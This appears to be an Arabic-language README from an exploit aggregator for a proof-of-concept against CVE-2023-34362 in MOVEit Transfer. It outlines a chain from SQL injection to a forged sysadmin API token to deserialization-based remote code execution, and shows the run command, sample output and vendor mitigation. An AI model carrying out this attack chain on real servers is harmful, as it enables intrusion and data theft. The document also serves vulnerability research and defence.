## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MALWAREMAN007-CVE-2023-34362
# CVE-2023-34362
POC لثغرة CVE-2023-34362 التي تؤثر على MOVEit Transfer
## التحليل الفني
يمكن العثور على تحليل فني للسبب الجذري للثغرة على المدونة:
## الملخص
* يستغل هذا الـ POC حقن SQL للحصول على رمز وصول لواجهة برمجة التطبيقات (API) بصلاحيات مسؤول النظام، ثم يستخدم هذا الوصول لاستغلال استدعاء إلغاء التسلسل (deserialization) لتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE).
* يحتاج هذا الـ POC إلى الوصول إلى نقطة نهاية لمزوّد الهوية (Identity Provider) تستضيف شهادات RS256 مناسبة تُستخدم لتزوير رموز مستخدم عشوائية - بشكل افتراضي، يستخدم هذا الـ POC نقطة نهاية IDP الخاصة بنا المستضافة في AWS.
* سيقوم الاستغلال افتراضيًا بكتابة ملف إلى C:\Windows\Temp\message.txt. يمكن إنشاء حمولات بديلة باستخدام مشروع ysoserial.net.
## الاستخدام
root@kitploit:~
python CVE-2023-34362.py https://127.0.0.1
[*] Getting sysadmin access token
[*] Got access token
[*] Getting FolderID
[*] Got FolderID: 963611079
[*] Starting file upload
[*] Got FileID: 965943963
[*] Injecting the payload
[*] Payload injected
[*] Triggering payload via resume call
[+] Triggered the payload!
[*] Deleting uploaded file
## إجراءات التخفيف
قم بالتحديث إلى أحدث إصدار أو خفّف من المخاطر باتباع التعليمات الواردة في الاستشارة الأمنية الصادرة عن Progress
* https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023
## إخلاء المسؤولية
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا عند التصريح بذلك صراحةً. لا يتحمل القائمون على المشروع أي مسؤولية عن سوء استخدام البرنامج. استخدمه بمسؤولية.